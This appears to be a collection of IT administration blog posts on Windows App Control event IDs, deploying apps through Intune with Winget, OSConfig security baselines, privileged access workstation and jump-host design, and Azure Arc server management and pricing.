PassesManagedInstaller	Indicates whether the file originated from a MI
SmartlockerEnabled	Indicates whether the specified policy enables ISG trust
PassesSmartlocker	Indicates whether the file had positive reputation according to the ISG
AuditEnabled	True if the App Control policy is in audit mode, otherwise it is in enforce mode
PolicyName	The name of the App Control policy to which the event applies

Enabling ISG and MI diagnostic events

To turn on 3090 allow events, just create a TestFlags registry key with a value of 0x300 using the PowerShell command below. After that, restart your computer to apply the changes.

powershell

reg add hklm\system\currentcontrolset\control\ci -v TestFlags -t REG_DWORD -d 0x300

Events 3091 and 3092 are inactive on some versions of Windows and are turned on by the preceding command.

Other Event IDs

Event ID	Description
3001	An unsigned driver was attempted to load on the system
3002	Code Integrity couldn't verify the boot image as the page hash couldn't be found
3004	Code Integrity couldn't verify the file as the page hash couldn't be found
3010	The catalog containing the signature for the file under validation is invalid
3011	Code Integrity finished loading the signature catalog
3012	Code Integrity started loading the signature catalog
3023	The driver file under validation didn't meet the requirements to pass the App Control policy
3024	Windows App Control was unable to refresh the boot catalog file
3026	Microsoft or the certificate issuing authority revoked the certificate that signed the catalog
3032	The file under validation is revoked or the file has a signature that is revoked
3033	The file under validation didn't meet the requirements to pass the App Control policy
3034	The file under validation wouldn't meet the requirements to pass the App Control policy if it was enforced
3036	Microsoft or the certificate issuing authority revoked the certificate that signed the file being validated
3064	If the App Control policy was enforced, a user mode DLL under validation wouldn't meet the requirements to pass the App Control policy. The DLL was allowed since the policy is in audit mode
3065	If the App Control policy was enforced, a user mode DLL under validation wouldn't meet the requirements to pass the App Control policy
3074	Page hash failure while hypervisor-protected code integrity was enabled
3075	This event measures the performance of the App Control policy check during file validation
3076	This event is the main App Control block event for audit mode policies. It indicates that the file would have been blocked if the policy was enforced
3077	This event is the main App Control block event for enforced policies. It indicates that the file didn't pass your policy and was blocked
3079	The file under validation didn't meet the requirements to pass the App Control policy
3080	If the App Control policy was enforced, the file under validation wouldn't have met the requirements to pass the App Control policy
3081	The file under validation didn't meet the requirements to pass the App Control policy
3082	If the App Control policy was enforced, the policy would have blocked this non-WHQL driver
3084	Code Integrity is enforcing WHQL driver signing requirements on this boot session
3085	Code Integrity isn't enforcing WHQL driver signing requirements on this boot session
3086	The file under validation doesn't meet the signing requirements for an isolated user mode (IUM) process
3089	This event contains signature information for files that were blocked or audit blocked by App Control. One 3089 event is created for each signature of a file
3090	Optional This event indicates that a file was allowed to run based purely on ISG or managed installer
3091	This event indicates that a file didn't have ISG or managed installer authorization and the App Control policy is in audit mode
3092	This event is the enforcement mode equivalent of 3091
3095	The App Control policy can't be refreshed and must be rebooted instead
3096	The App Control policy wasn't refreshed since it's already up-to-date
3097	The App Control policy can't be refreshed
3099	Indicates that a policy has been loaded. This event also includes information about the options set by the App Control policy
3100	The App Control policy was refreshed but was unsuccessfully activated. Retry
3101	The system started refreshing the App Control policy
3102	The system finished refreshing the App Control policy
3103	The system is ignoring the App Control policy refresh
3104	The file under validation doesn't meet the signing requirements for a PPL (protected process light) process
3105	The system is attempting to refresh the App Control policy
3108	Windows mode change event was successful
3110	Windows mode change event was unsuccessful
3111	The file under validation didn't meet the hypervisor-protected code integrity (HVCI) policy
3112	Windows has revoked the certificate that signed the file being validated
3114	Dynamic Code Security opted the .NET app or DLL into App Control policy validation. The file under validation didn't pass your policy and was blocked

Create a Win32 Universal app with Winget | Intune

Thu, 22 May 2025 21:04:04 GMT

Install Win32 Apps with Winget
No more packaging required No more packaging required"">

👋 Introduction

Using Intune to install apps on Windows devices is really useful, but anyone who has set up lots of these knows how tricky it can be: getting the right version of the installer, changing it when new versions of apps are released, and keeping everything up to date. The idea of a "universal app" installer is really interesting. This is an app that can install any application, and it doesn't need the usual packaging.

But this approach isn't simple. Intune installs software in the system context, which is necessary for elevated permissions and seamless deployments, but it also introduces unique challenges. Winget, for example, is installed for each user via the Microsoft Store, and its different parts are not always easy to find in the system. This means that simply using Winget from a script won't work straight away when you use Intune to deploy it.

Even though there are some problems, if you set everything up right and add a few scripts, you can use Winget to create a process for deploying apps that is flexible, easy to maintain, and efficient. In this article, I will explain how to make this strategy work, talk about the technical things you need to think about, and give you some useful tips to help you manage your Intune applications more easily.

🤷 How are we going to do this?

To accomplish this kind of 'Universal App' which you can use to install any Winget application, we first need some kind of universal installation method deployed with Intune. The same for the uninstall method and the detection method.

So How are we going to do this?

1️⃣ First, we need a method to install an app without repackaging. We'll achieve this by passing the application as a parameter to our installation script.

powershell

.\[ScriptName].ps1 -app [Parameter]

2️⃣ Next we need to create a script that accepts the application ID as a parameter, allowing us to install any app by simply parsing it the Winget package ID.

At the Start we need to declare the parameter that we want to pars to the script.

powershell

Param(
    [string]$app
)

Now we need to find the proper Winget folder so we can use it in system context. With that we can use the winget version that comes preinstalled with Windows. To locate the correct folder regardless of the installed version, we first need to resolve the path dynamically.

IMPORTANT

wingetcan not just be used as a command in system context (while permorming an installation through Intune), because winget gets installed trough the Windows Store as the App Installer and because of this important parts are not in place in sytem context.

powershell

$ResolveWingetPath = Resolve-Path "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_*_x64__8wekyb3d8bbwe\winget.exe"
    if ($ResolveWingetPath){
           $WingetPath = $ResolveWingetPath[-1].Path
    }

$Wingetpath = Split-Path -Path $WingetPath -Parent
Set-Location $Wingetpath

At last, we call winget.exe with the required parameters and the application ID we parsed earlier.
This command will perform a silent, machine wide installation of the specified app in system context.

powershell

.\winget.exe install --exact --id $app --silent --accept-package-agreements --accept-source-agreements --scope machine --disable-interactivity

WARNING

Calling the app installation with the --exact parameter enables us to install the specific App we want and not get a similar sounding app. But be aware that the App ID is now case sensitive and will not work if you make a spelling error.

3️⃣ Repeat the process for the uninstallation script, updating only the command and parameters to perform an uninstall.

powershell

.\winget.exe uninstall --exact --id $app --silent --accept-source-agreements --scope machine --disable-interactivity

4️⃣ At the end we still need to create the detection, which can be a bit tricky because we can not simply use winget for that. If we would simply ask Winget with the command winget list Notepad++.Notepad++ it would give us an accourate answer, but that does not mean we get it in an easily usable format.

This is the answer we get from winget

but if we capture the result it acutally commes out as an array. In addition the line No installed package found matching input criteria is always in the prefered language.

That is why we use the registry to find if the application is installed.

First we declare our parameter.

powershell

$appname = "Notepad++"

Then we check for the registry entry in the 64-bit application path. If it is found we escape with the exit code 0 (success).

powershell

# This is for 64-bit applications on 64-bit systems
$app = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -like "*$($appname)*" }

if ($app) {
    Write-Host "Found app $($appname)!"
    exit 0
}

If the application is not found under the 64-bit path, we then check the 32-bit application registry path. If the app is detected here, we exit with exit code 0 (success) and if not, with exit code 1 (not found).

powershell

# This is for 32-bit applications on 64-bit systems
$app = Get-ItemProperty HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -like "*$($appname)*" }

if ($app) {
    Write-Host "Found app $($appname)!"
    exit 0
}
else {
    Write-Host "Did not find app $($appname)!"
    exit 1
}

Now we putting it all together.

📦 Use Winget to identify package information

When you open a PowerShell window you can use the Windows Package Manager with the wingetcommand. Winget will be pre-installed on all new Windows versions since Windows 10 21H2 or Windows 11 21H1. Alternativly you can download it at aka.ms/getwinget.

To find the package ID of the application you want to install, use the following command:

powershell

# Example for Notepad++
winget search Notepad++

📱 Create and implement the Intune App

Creating the App Package

Download the Microsoft-Win32-Content-Prep-Tool from the Microsoft GitHub Page and unpack the ZIP file.
In the unpacked folder create another folder called 'App' and copy the installation and uninstallation scripts into it (You can download both in my GitHub Repository).
Open a Powershell window and navigate to the folder where you extracted the downloaded files and run the IntuneWinAppUtil.exe.
You will now be asked to specify a source folder, a setup file, an output folder and whether you want to use a catalog folder or not. After that you press Enter.

TIP

You can also download the finished INTUNEWIN file via DownGit from my GitHub Repository.

Creating the Intune App

Open the Apps blade in the Intune admin center, select 'Windows' and click 'Add'.
Select the App type: Windows app (Win32).
Now click 'Select app package file' and select the INTUNEWIN file you created before.

Now enter the name of the application and any additional information you need.

The following tab 'Program' allows you to enter the installation and uninstallation commands.

With the install command, we parse the scripts inside the `INTUNEWIN` file, the `-app` (Notepad++.Notepad++) parameter, which it will use to determine the intended app.

powershell

Powershell.exe -NoProfile -ExecutionPolicy ByPass -File .\install_app.ps1 -app Notepad++.Notepad++

The same is true for the uninstall command.

powershell

Powershell.exe -NoProfile -ExecutionPolicy ByPass -File .\uninstall_app.ps1 -app Notepad++.Notepad++

In the next tab 'Requirements' you can set the 'Operating system architecture' (64-bit) and 'Minimum operating system' (for example 'Windows 10 21H1').
In the 'Detection rules' tab, select 'Use a custom detection script' and upload the detection script you created earlier or download it from my GitHub Repository.

powershell

$appname = "Notepad++"

# This is for 64-bit applications on 64-bit systems
$app = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -like "*$($appname)*" }

if ($app) {
    Write-Host "Found app $($appname)!"
    exit 0
}

# This is for 32-bit applications on 64-bit systems
$app = Get-ItemProperty HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Where-Object { $_.DisplayName -like "*$($appname)*" }

if ($app) {
    Write-Host "Found app $($appname)!"
    exit 0
}
else {
    Write-Host "Did not find app $($appname)!"
    exit 1
}

WARNING

Be aware that you need to change the app name in the detection script for every new app.
Don`t use the Winget app ID here, but instead the actual app name that would appear in Windows.

Leave both options set to 'No' and proceed to the next tab.
Next, you can skip the 'Dependencies' and 'Supersedence' and then assign the application to whomever you need.

💡 Conclusion

And that's it! With this approach, you can quickly roll out almost any app to your devices using Intune and Winget. No more tedious packaging and repackaging apps over and over. It's a huge time saver and keeps your deployment process flexible and modern by only using native tools. Give it a try, and you'll wonder why you ever did it any other way. 😉

Key Advantages

Eliminates need for traditional app packaging
No need to periodically update app packages
Streamlines deployment process
Maintains robust Intune management capabilities
Uses native Windows Package Manager
Requires minimal setup (just one .intunewin file for all apps)
Easy to maintain and add to
Keeps the same reporting and management capabilities as traditional Win32 apps

How to modify for another app

Use the same .intunewin file - no need to create a new one
Find the new app's package ID using: winget search [app name]
Modify the install command:

powershell

Powershell.exe -NoProfile -ExecutionPolicy ByPass -File .\install_app.ps1 -app [new package ID]

Modify the uninstall command:

powershell

Powershell.exe -NoProfile -ExecutionPolicy ByPass -File .\uninstall_app.ps1 -app [new package ID]

Update the detection script with the new package ID:

powershell

$appname = "[new package ID]"
*
*

The rest of the configuration in Intune remains the same - just update the app name and description to match your new application.

Configure Windows Server security baselines with OSConfig | Powershell

Sun, 18 May 2025 16:56:40 GMT

Configure Windows Server security baselines with OSConfig

👋 Introduction

OSConfig is a handy tool that simplifies security configuration by using scenarios to quickly set up and manage your devices, whether they're on-premises or connected through Azure Arc. At its core, OSConfig combines PowerShell cmdlets, built-in APIs, and scenario definitions to help you define and maintain the desired state of your systems. Think of OSConfig as a built-in feature of Windows Server that makes configuring your devices easier.

Here are some of the key highlights of the security baselines:

Secured-Core: UEFI MAT, Secure Boot, Signed Boot Chain
Protocols: TLS Enforced 1.2+, SMB 3.0+, Kerberos AES
Credential protection: LSASS/PPL
Account and password policies
Security policies and security options

One of the coolest things about OSConfig is its drift control feature. It keeps your system locked into a secure, known good state. Once you enable it, OSConfig takes care of any unexpected changes by automatically fixing them. It does this through a refresh task that runs in the background, so you don’t have to worry about your system drifting away from its desired configuration.

IMPORTANT

Currently OSConfig securits baselines only support Windows Server 2025.

💾 Installation

Open a PowerShell session as an Administrator and use the following command to install the needed Module

powershell

Install-Module -Name Microsoft.OSConfig -Scope AllUsers -Repository PSGallery -Force

🧑‍🔧 Configuration

Configure the security baselines

To set up the security baseline using Desired State Configuration (DSC), just run the commands below.
Make sure to open PowerShell as an Administrator to get the necessary permissions.

ConfigureVerifyRemoveCheck compliance

powershell

# To apply the baseline for a domain-joined device, run the following command:
Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/MemberServer -Default

# To apply the baseline for a device that's in a workgroup, run the following command:
Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/WorkgroupMember -Default

# To apply the baseline for a device that's configured as the DC, run the following command:
Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/DomainController -Default

# To apply the secured-core baseline for a device, run the following command:
Set-OSConfigDesiredConfiguration -Scenario SecuredCore -Default

# To apply the Microsoft Defender Antivirus baseline for a device, run the following command:
Set-OSConfigDesiredConfiguration -Scenario Defender/Antivirus -Default

powershell

# To verify that the baseline for a domain-joined device is properly applied, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/MemberServer

# To verify that the baseline for a device that's in a workgroup is properly applied, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/WorkgroupMember

# To verify that the baseline for a device that's configured as the DC is properly applied, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/DomainController

# To verify that the secured-core baseline for a device is properly applied, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecuredCore

# To verify that the Microsoft Defender Antivirus baseline for a device is properly applied, run the following command:
Get-OSConfigDesiredConfiguration -Scenario Defender/Antivirus

powershell

# To remove the baseline for a domain-joined device, run the following command:
Remove-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/MemberServer

# To remove the baseline for a device that's in a workgroup, run the following command:
Remove-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/WorkgroupMember

# To remove the baseline for a device that's configured as the DC, run the following command:
Remove-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/DomainController

# To remove the secured-core baseline for a device, run the following command:
Remove-OSConfigDesiredConfiguration -Scenario SecuredCore

# To remove the Microsoft Defender Antivirus baseline for a device, run the following command:
Remove-OSConfigDesiredConfiguration -Scenario Defender/Antivirus

powershell

# To obtain the desired configuration details for the specified scenario, use the following commands.
# The output appears in a table format that includes the name of the configuration item, its compliance status, and the reason for noncompliance.

# To check the compliance details for a domain-joined device, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/MemberServer | ft Name, @{ Name = "Status"; Expression={$_.Compliance.Status} }, @{ Name = "Reason"; Expression={$_.Compliance.Reason} } -AutoSize -Wrap

# To check the compliance details for a workgroup device, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/WorkgroupMember | ft Name, @{ Name = "Status"; Expression={$_.Compliance.Status} }, @{ Name = "Reason"; Expression={$_.Compliance.Reason} } -AutoSize -Wrap

# To check the compliance details for the DC baseline, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/DomainController | ft Name, @{ Name = "Status"; Expression={$_.Compliance.Status} }, @{ Name = "Reason"; Expression={$_.Compliance.Reason} } -AutoSize -Wrap

# To check the compliance details for the secured-core baseline, run the following command:
Get-OSConfigDesiredConfiguration -Scenario SecuredCore | ft Name, @{ Name = "Status"; Expression={$_.Compliance.Status} }, @{ Name = "Reason"; Expression={$_.Compliance.Reason} } -AutoSize -Wrap

# To check the compliance details for the Microsoft Defender Antivirus baseline, run the following command:
Get-OSConfigDesiredConfiguration -Scenario Defender/Antivirus | ft Name, @{ Name = "Status"; Expression={$_.Compliance.Status} }, <span>@{ Name = "Reason"; Expression={$_.Compliance.Reason} } -AutoSize -Wrap

IMPORTANT

When you apply or remove a security baseline, a restart is required for changes to take effect.
When you customize a security baseline, a restart is required for changes to take effect, depending on which security features you modified.
During the removal process, when security settings are reverted, changing these settings back to their premanaged configuration isn't guaranteed. It depends on the specific settings within the security baseline. This behavior aligns with the capabilities that the Microsoft Intune policies provide. To learn more, see details below.

Remove a security baseline assignment

Asset Security | Security

Sun, 18 May 2025 16:56:40 GMT

Securing your assets

Getting to know the tools

1. Enterprise access model

The Enterprise Access Model is a way to secure access to your company's data and systems. Here's the breakdown:

Think of it as a layered security plan. It splits your IT infrastructure into different sections based on how sensitive the information is.
Most secure areas get the tightest controls. Only authorized people with minimal access can enter these areas. Imagine a vault for critical systems like domain controllers.
Other areas are less restricted, but access is still controlled. Think of this as access to applications and data depending on an employee's role. A marketing team might not need access to engineering data.
Security is always on. We double-check everyone's identity and only grant the minimum access needed to do their job.
It works for all your IT environments. Whether it's on-premises servers, cloud storage, or remote access, the model ensures consistent security. This approach helps prevent unauthorized access and keeps your company data safe from potential threats.

Data/Workload Plane: This layer encompasses all the applications, databases, and files that an organization relies on. It’s where the real work happens the digital machinery behind the scenes.
Management Plane: Think of this as the control center. IT professionals manage and oversee systems here. They ensure everything runs smoothly, like air traffic controllers guiding planes safely through the skies.
Control Plane: Here’s where security takes center stage. The Control Plane verifies identities before granting access. Whether it’s a user logging in or an application requesting data, they need proper credentials.
User Plane: This is the interface where users interact directly with applications and data. It’s the bridge between people and technology.

The legacy Enterprise Access Model, also known as the Tier Model, was an earlier approach from Microsoft for securing access within a company's IT system.

Imagine three levels of access. Each level had stricter controls than the one below.
(Tier 0) was the most secure. Only highly privileged users, like IT security admins, could access this level. This is where critical systems like domain controllers lived.
(Tier 1) housed important resources. Think of this as a server room with business applications and sensitive data. Authorized IT personnel could access this area for maintenance or management tasks.
(Tier 2) was the least restricted. This is where regular employees accessed their computers and everyday applications. Security wasn't as tight here, but access wasn't wide open either.

The Tier Model was mainly designed for on-premises servers and didn't consider complexities, like cloud.

Enterprise access model

2. Priviliged Access Workstation (PAW)

Absolutely, as an IT security engineer, I can tell you all about a Privileged Access Workstation (PAW).

A PAW is a special kind of computer designed for high-security tasks. It's essentially a locked-down workstation built for users with administrative privileges, like system administrators. These users manage critical systems and data, so it's essential to keep their access secure.

Here's what makes a PAW special:

Isolation: PAWs are isolated from the internet and other potential threats. This means no web browsing, email, or other risky activities on the PAW itself. It minimizes the attack surface, making it harder for attackers to exploit vulnerabilities.
Security Controls: PAWs have strict security controls. Local administrator access and even some productivity tools are restricted. The focus is on providing only what's absolutely needed for those high-risk tasks.
Dedicated Use: PAWs are dedicated workstations for privileged users. They shouldn't be used for everyday tasks like checking email or browsing the web. Separate workstations should be used for those activities.

By isolating privileged accounts and activities, PAWs make it much more difficult for attackers to gain a foothold in your systems, even if they compromise a privileged account.

3. Jump Host

A Jump Host is a special-purpose computer on a network specifically designed and configured to provide access to a private network from an external network, such as the internet.

The idea behind a Jump Host is to create a single point of entry into a network for security purposes. This host is typically highly secured and monitored.

This setup provides several benefits:

Security: By limiting access to your internal network only through the Jump Host, you reduce the surface area for attacks.
Monitoring: It's easier to monitor and audit traffic when it's all going through a single point.
Management: User access can be managed more effectively. For example, changes to access policies need only be implemented on the Jump Host.

In essence, a Jump Host acts as a bridge between two networks, providing a controlled means of access between them. It's an important concept in network security, particularly in cloud computing environments.

Bringing the tools together into one concept

Firstly why should you use these or related tactics to secure your Infrastructure? This is the easy part. Many of the above strategies are part of the one or other Zero Trust framework. But beyond Zero Trust, securing your most precious digital assets is one of the most important things you need to do as an IT Leader. With bringing specifically these tools together, there is a way to protect one, two or however many tiers of differend assets you have, without having to invest in a full Zero Trust framework.

But how? I here you ask.

Like seen in the diagram we can use an adapted PAW, as the entry point. This should be a cloud VM or at least a normal VM, but it can of course be a physical machine.
- Adapted in the sense, that it is reachable from the outside, but it needs to be locked down, so nothing can be done with it, infiltrated or exfiltrated through it.
- In addition the access is secured through MFA, conditional access and varoius other security meassures.
This PAW connects then via IPSec to a Jump Server. This Jump Server can only be reached from this PAW. From nowhere else are connections excepted.
- Not only RDP, but all connections.
This Jump Host can then connect to the assets (Server, Firewalls, etc.) you want to protect.
- Or the Jump Host can hold the tools to control these assets.
The connection to the assets are in turn via an IPSec tunnel and they will only accept connections from this Jump Host or a Group of Jump Hosts (depending on the volume of connections).
- In addition to the traffic from the Jump Hosts the assets will accept traffic regarding there specific use (Application Traffic for example).
Connections will be be dropped after a certain amount of inactivity and disconnected sessions will be dropped immediatly.
The PAW will be wiped after use immediately or directly redeployed.

With this adaptation and combination of the previously mentioned concepts, you can relativly low cost purpose build secure connections to especially importand assets and even use remote access. It is not ideal and doesn`t employ all zero trust elements, but it is a good start to make important assets like domain controllers or business relevant databasses much more secure, protecting them from vertical attack movement and RAM dumping technics. In addition the attack surface is enormously reduced and there is a much lower chance of a breach and easier monitoring.

Azure Arc Server Management | Azure

Thu, 24 Apr 2025 20:16:28 GMT

Azure Arc Server Management

👋 Introduction

Azure Arc is a cool service from Microsoft that lets you bring Azure's management tools to your on-premises, multi-cloud, and edge setups. It gives you one place to manage all your resources whether they're Windows or Linux servers, Kubernetes clusters, or databases no matter where they're running.

Here’s what you can do with Azure Arc:

Manage hybrid environments: Treat non-Azure resources like they’re in Azure by projecting them into Azure Resource Manager.
Unified management: Use the same Azure tools you already know to manage everything in your environment.
Kubernetes management: Connect and manage Kubernetes clusters anywhere, and use GitOps to handle configurations.
Data services: Run Azure data services like SQL Managed Instance and PostgreSQL on any infrastructure, with all the perks like updates, security, and monitoring.

Azure Arc makes it super easy to manage and govern your resources, helping you keep everything consistent and running smoothly across different environments.

💰 Cost

Azure Arc – core control plane

Services	Price
Inventory Tag your resources, organize them into resource groups, subscriptions, and management groups, and query at scale with Azure Resource Graph to unify your environments.	FREE
Manage Administrate your servers anywhere using SSH Arc, Run Command, and Custom Script Extension.	FREE
VM Self-service Perform lifecycle management such as (create, resize, update and delete) and powercycle operations such as (start, stop, and restart on VMware vCenter and System Center Virtual Machine Manager Virtual Machines).	FREE

Azure Arc-enabled servers

INFO

Add-on Azure management services, such as Azure Update Manager, Azure Policy guest configuration, Azure Monitor, Microsoft Defender for Cloud, and Microsoft Sentinel, are charged for Azure Arc-enabled servers when enabled. The total monthly price of Azure Arc-enabled servers depends on the number of Azure management and security services you run on each server and the plan or SKU purchased.

With Microsoft Defender for Cloud Plan 2, Azure Policy guest configuration and Azure Update Manager are included at no additional cost. With Microsoft Defender for Cloud Plan 1, these two additional services are not included and can be purchased separately.

Customers with Windows Server licenses have active Software Assurance or Windows Server licenses which are active subscription licenses may access the following features at no additional cost. Some of these features may incur log ingestion, compute, storage costs which are paid. Learn more here:

Azure Update Manager
Change Tracking & Inventory
Azure Machine Configuration
Windows Admin Center in Azure for Arc-enabled servers
Remote Support
Best Practices Assessment
Azure Site Recovery configuration
Advanced networking

These services are billed on a per server basis:

Services	Price
Microsoft Defender for Servers Plan 1	€5/server/month €0.007/server/hour
Microsoft Defender for Servers Plan 2	€14/server/month €0.019/server/hour
Azure Update Manager	€5/server/month €0.150/server/day
Azure Policy Guest Configuration and Change Tracking & Inventory	€5.557/server/month
Hotpatching	Preview

These services are billed on a per GB ingested basis:

Services	Price
Azure Monitor Analytics Logs	€2.557/GB
Azure Monitor SCOM Managed Instance	€5.557/month
Microsoft Sentinel	€4.779/GB-ingested

Windows Server pay-as-you-go enabled by Azure Arc

Services	Monthly Price	Hourly Price
Windows Server Pay-as-you-go enabled by Azure Arc	€31.099/core/month	€0.043/core/hour

SQL Server pay-as-you-go enabled by Azure Arc

INFO

If you have an existing SQL Server license, you can also unlock Azure manageability and security with Azure Arc. See the complete set of features available for customers with existing SQL Server licenses including different SQL Server licenses set billing options. Manage SQL Server license and billing options - Azure Arc-enabled SQL Server | Microsoft Learn

For customers without an active SQL Server license:

Services	Monthly Price	Hourly Price
Standard Edition	€67.6052	€0.0927
Enterprise Edition	€253.5192	€0.3473

Extended Security Updates enabled by Azure Arc

INFO

Microsoft provides Extended Security Updates with Azure Arc for Windows Server 2012/R2 and SQL Server 2012/2014

For Windows Server 2012/R2:

Services	Datacenter Monthly Price	Standard Monthly Price
Windows Server 2012 16 Core	€404	€71
Windows Server 2012 8 Core	€202	€36
Windows Server 2012 2 Core	€51	€8.77

For SQL Server 2012:

Services	Datacenter Monthly Price	Standard Monthly Price
SQL Server 2012 2 Core	€906	€230

For SQL Server 2014:

Services	Datacenter Monthly Price	Standard Monthly Price
SQL Server 2014 2 Core	€1,001	€257

TIP

For detailed pricing based on your region, visit Azure Arc pricing.

🧑‍🔧 How to configure Azure Arc

Installing Agent

With Windows Server 2025, Azure Arc is already available with the OS and ready to deploy.

Open the Azure Arc tray icon and click Launch Azure Arc Setup.

Just click Next and Configure in the Azure Arc Agent Setup.

Older Windows Servers or other resources can be added via the Azure Admin Portal -> Azure Arc.

You can add a server by downloading the installer mentioned earlier or by creating the resource directly in Azure and downloading the corresponding script for setup.

Or you can connect a Host environment by creating a resource bridge.

Configuring Agent

After the installation the Conmfiguration of the Azure Arc Agent starts.

Select your Azure cloud Environment and sign-in to Azure with your browser on the machine or with https://microsoft.com/devilogon on another machine if you can`t access a browser on your resource.
- Azure China Cloud
- Azure Global
- Azure US Goverment Cloud

DANGER

Beware that you need to have to allow authentication flow in your conditional access policies for the devilogon to function.

Select the recourse details for your Azure Arc resource and click Next.

INFO

For more details on the Network Connectivity options, check out Network topology and connectivity for Azure Arc-enabled servers | Microsoft Learn.

Then the Azure Arc Agent connects to Azure and registeres your resource.

When the Azure Arc Agent runs correctly you can find the Agent Information in the tray icon.

Information and Configuration in the Azure Portal

Azure Arc Portal

You can find all your Azure Arc resources under Azure Admin Portal -> Azure Arc.

Once your resources are configured, you can view detailed information and an overview in the Azure Arc Overview section.
In the Snapshots tab, you can access an overview of your Azure Arc environment.
- Resource summary
- Host environment
- Recently viewed in Azure Arc
- Azure Monitor agent
- Update Manager
- Microsoft Defender for Servers
- Policy compliance
- Windows Admin Center

In the Monitoring tab, you can check out the latest connection and security details for your Azure Arc environment.
- Connectivity
- Secure score
- Alerts

In the Licensing section of Azure Arc Portal, you can easily check out an overview of your Windows Server and SQL Server Pay-as-you-go licenses, along with any Azure benefits you're using.

Azure Arc Mashine

If you drill down into a specific Azure Arc resource you get a great overview about the current status and configuration.

Seen in the following Windows Server example.

Notable configurations include:

RBAC Controls: Configure Role-Based Access Control to manage permissions for your resource.

Connect via SSH in the Browser: Securely connect to your servers directly from the Azure portal using browser-based SSH.

Policies: Enforce compliance and governance using Azure Policy for consistent configurations across resources.

Machine Configuration: Automate configuration management and ensure compliance with desired state configurations.

Run Commands via PowerShell: Execute PowerShell commands remotely on your Azure Arc-enabled servers for administrative tasks.

Run Command uses the Connected Machine agent to let you remotely and securely run a script inside this Azure Arc-enabled servers.
This can be useful for loads of scenarios across troubleshooting, recovery, diagnostics, and maintenance.
You can run commands through Azure CLI or PowerShell.

Operation	Description
Create Or Update	The operation will create a new Run command to update an existing Run Command
Delete	The operation will delete or stop an existing Run command
Get	The operation will get details for an existing Run Command
List	The operation will get all the Run Commands for an Arc-enabled server
Update	The operation will update an existing Run Command

Windows Updates: Manage and deploy Windows updates across your servers using One-time update, Periodic assessment or the Azure Update Manager.
- One-time update
  1. Pick the machines where you want to install updates.
  2. Choose the updates you want to apply.
  1. Decide if a reboot is okay or not.
  Reboot options:
  - Reboot if required
  - Never reboot
  - Always reboot
  
  Maintenance window (in minutes):
  - 60 to 235
  1. Finally, hit Install and you're good to go!
- Azure Update Manager
  1. When you select the Azure Update Manager you get on overview about the current update status of your Azure Arc environment.
  2. In addtion you can configure update policies, create One-time updates or check the update history.
  INFO
  
  You can learn more on Microsoft Learn for a detailed overview of Azure Update Manager.
- Periodic assessment
  
  If you turn on Periodic assessment it will automatically check for updates every 24 hours.
  
  INFO
  
  You can check out more details at Assessment options in Update Manager | Microsoft Learn.
  1. You can enable the feature if you click Enable now in the overview.
  1. Now you can enable the Periodic assessment for the servers you want and then select Save.
When the Updates are installed you can see it in the overview.
Tracking with Log Analytics: Monitor changes, inventory, and performance metrics for your Azure Arc-enabled resources.
- Inventory
  
  You can maintain a detailed inventory of your resources here.
  To enable the Inventory you need to have a Log Analytics Workspace.
  
  After the activation you can see an inventory of the Software, Files, Registry and Services.
  
  INFO
  
  You can check out more details at Overview of change tracking and inventory using Azure Monitoring Agent | Microsoft Learn.
- Change Tracking
  
  Monitor and track changes to your infrastructure to ensure consistency and compliance across your environment.
  
  INFO
  
  This Tracking uses the same Log Analytics Workspace the Inventory blade uses.
- Insights
  
  Gain deeper visibility into the performance and health of your resources.
  
  To get Insights up and running, just follow these steps:
  1. Hit the Enable button on the Insights page.
  1. Create a new Data collection rule.
  2. While setting up the Data collection rule, make sure to check the Enable processes and dependencies option. This unlocks the awesome Map feature.
  INFO
  - If you stick with the default collection rule, the Map feature won’t work.
  - You’ll need a Log Analytics Workspace for the new rule, but don’t worry you can reuse the same Workspace you’re already using for other tracking logs.
  1. Refresh your browser, wait a few seconds, and voilà! You’ll start seeing real-time performance metrics, along with details about processes and dependencies on your machine.
    
    You can monitor the following performance metrics for your resources:
    - CPU Utilization
    - Available Memory
    - Logical Disk IOPS
    - Logical Disk MB/s
    - Logical Disk Latency (ms)
    - Max Logical Disk Used %
    - Bytes Sent Rate
    - Bytes Received Rate
- Logs
  
  In the Logs section you can create classic table queries for the data collected in you Log analytics workspace for troubleshooting and insights.
Licensing: Manage and monitor licensing for Windows Server and SQL Server, including pay-as-you-go options.

Admin Center: Use Windows Admin Center in Azure for streamlined server management from the cloud.

To get Windows Admin Center up and running, just follow these steps:
1. Hit the Set up button on the Windows Admin Center page.
2. Select a Listening port and click Install.
IMPORTANT

Please be aware that you need to edit RBAC roles to use the Windows Admin Center.

As soon as the Windows Admin Center is set up you can access and edit the following features:

In additon you can find the following live metrics:

NOTE

Please note that an appropriate license is required to access this feature.
Site Recovery: Configure Azure Site Recovery for disaster recovery and business continuity.

The Azure Site Recovery setup tool helps you handle replication, failover, and failback for your on-premises and Azure virtual machines (VMs) running on Arc-enabled Windows Server. It’s a great way to keep your on-premises workloads running smoothly during outages by replicating them to Azure as a backup location.

INFO

You can find out more here Configure Azure Site Recovery for Arc-enabled Windows servers | Microsoft Learn.

Best Practices Assessment: Evaluate your environment against best practices to optimize performance and security.

